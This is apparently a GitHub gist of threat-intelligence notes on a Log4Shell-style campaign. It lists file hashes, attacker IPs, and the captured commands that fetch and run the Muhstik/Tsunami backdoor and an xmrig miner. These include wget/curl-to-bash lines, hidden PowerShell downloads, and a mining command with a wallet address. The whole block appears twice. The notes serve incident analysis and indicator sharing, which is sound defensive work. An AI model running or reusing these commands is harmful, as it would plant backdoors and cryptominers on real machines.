yt0ng/gist:8a87f4328c8c6cde327406ef11e68726

## gistfile1.txt
45.130.229.168:1389/Exploit.class

Exploit.class 4d040caffa28e6a0fdc0d274547cf1c7983996fc33e51b0b2c511544f030d71b
--> curl http://18.228.7.109/.log/log

log d59dba711478b6c6fdba87a9cfc9af753783c4d9120111a9ef026c9362a8e74b
--> Download of Muhstik/Tsunami Backdoor
wget -O /tmp/pty3 http://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &
wget -O /tmp/pty4 http://18.228.7.109/.log/pty4; chmod +x /tmp/pty4; chmod 700 /tmp/pty4; /tmp/pty4 &
wget -O /tmp/pty2 http://18.228.7.109/.log/pty2; chmod +x /tmp/pty2; chmod 700 /tmp/pty2; /tmp/pty2 &
wget -O /tmp/pty1 http://18.228.7.109/.log/pty1; chmod +x /tmp/pty1; chmod 700 /tmp/pty1; /tmp/pty1 &
wget -O /tmp/pty3 http://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &
wget -O /tmp/pty5 http://18.228.7.109/.log/pty5; chmod +x /tmp/pty5; chmod 700 /tmp/pty5; /tmp/pty5 &

pty3 4f34f8f156fdf12e0817a610344b11abdee87cfbed862bf91eb7685c63696898

--> download of Muhstik/Tsunami

(curl http://210.141.105.67:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://210.141.105.67:80/wp-content/themes/twentythirteen/m8)|bash
(curl http://210.141.105.67:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://210.141.105.67:80/wp-content/themes/twentythirteen/m8)|bash
(curl http://159.89.182.117/wp-content/themes/twentyseventeen/ldm || wget -qO - http://159.89.182.117/wp-content/themes/twentyseventeen/ldm)|bash

m8 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514
ldm 39db1c54c3cc6ae73a09dd0a9e727873c84217e8f3f00e357785fba710f98129


######


Exploit.class
2b5f04d15e459132a5935260746788db39b469ea46859c4a5bb8625f8a80bd41
--> uses curl on linux for download of http://18.228.7.109/.log/log
--> and uses powershell on Windows
(new-object System.Net.WebClient).Downloadfile('http://172.105.241.146:80/wp-content/themes/twentysixteen/s.cmd', 's.cmd')

s.cmd 8A009DEE6BFB6F79C0881F5D150EEAD92C93354D47FD1CB204791320D2151634
--> downloads xmrig

powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://54.210.230.186:80/wp-content/themes/twentyfourteen/xmrig.exe','xmrig.exe')
xmrig.exe -o pool.supportxmr.com:5555 -u 46QBumovWy4dLJ4R8wq8JwhHKWMhCaDyNDEzvxHFmAHn92EyKrttq6LfV6if5UYDAyCzh3egWXMhnfJJrEhWkMzqTPzGzsE -p log
	45.130.229.168:1389/Exploit.class

	Exploit.class 4d040caffa28e6a0fdc0d274547cf1c7983996fc33e51b0b2c511544f030d71b
	--> curl http://18.228.7.109/.log/log

	log d59dba711478b6c6fdba87a9cfc9af753783c4d9120111a9ef026c9362a8e74b
	--> Download of Muhstik/Tsunami Backdoor
	wget -O /tmp/pty3 http://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &
	wget -O /tmp/pty4 http://18.228.7.109/.log/pty4; chmod +x /tmp/pty4; chmod 700 /tmp/pty4; /tmp/pty4 &
	wget -O /tmp/pty2 http://18.228.7.109/.log/pty2; chmod +x /tmp/pty2; chmod 700 /tmp/pty2; /tmp/pty2 &
	wget -O /tmp/pty1 http://18.228.7.109/.log/pty1; chmod +x /tmp/pty1; chmod 700 /tmp/pty1; /tmp/pty1 &
	wget -O /tmp/pty3 http://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &
	wget -O /tmp/pty5 http://18.228.7.109/.log/pty5; chmod +x /tmp/pty5; chmod 700 /tmp/pty5; /tmp/pty5 &

	pty3 4f34f8f156fdf12e0817a610344b11abdee87cfbed862bf91eb7685c63696898

	--> download of Muhstik/Tsunami

	(curl http://210.141.105.67:80/wp-content/themes/twentythirteen/m8 \|\| wget -qO - http://210.141.105.67:80/wp-content/themes/twentythirteen/m8)\|bash
	(curl http://210.141.105.67:80/wp-content/themes/twentythirteen/m8 \|\| wget -qO - http://210.141.105.67:80/wp-content/themes/twentythirteen/m8)\|bash
	(curl http://159.89.182.117/wp-content/themes/twentyseventeen/ldm \|\| wget -qO - http://159.89.182.117/wp-content/themes/twentyseventeen/ldm)\|bash

	m8 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514
	ldm 39db1c54c3cc6ae73a09dd0a9e727873c84217e8f3f00e357785fba710f98129


	######


	Exploit.class
	2b5f04d15e459132a5935260746788db39b469ea46859c4a5bb8625f8a80bd41
	--> uses curl on linux for download of http://18.228.7.109/.log/log
	--> and uses powershell on Windows
	(new-object System.Net.WebClient).Downloadfile('http://172.105.241.146:80/wp-content/themes/twentysixteen/s.cmd', 's.cmd')

	s.cmd 8A009DEE6BFB6F79C0881F5D150EEAD92C93354D47FD1CB204791320D2151634
	--> downloads xmrig

	powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://54.210.230.186:80/wp-content/themes/twentyfourteen/xmrig.exe','xmrig.exe')
	xmrig.exe -o pool.supportxmr.com:5555 -u 46QBumovWy4dLJ4R8wq8JwhHKWMhCaDyNDEzvxHFmAHn92EyKrttq6LfV6if5UYDAyCzh3egWXMhnfJJrEhWkMzqTPzGzsE -p log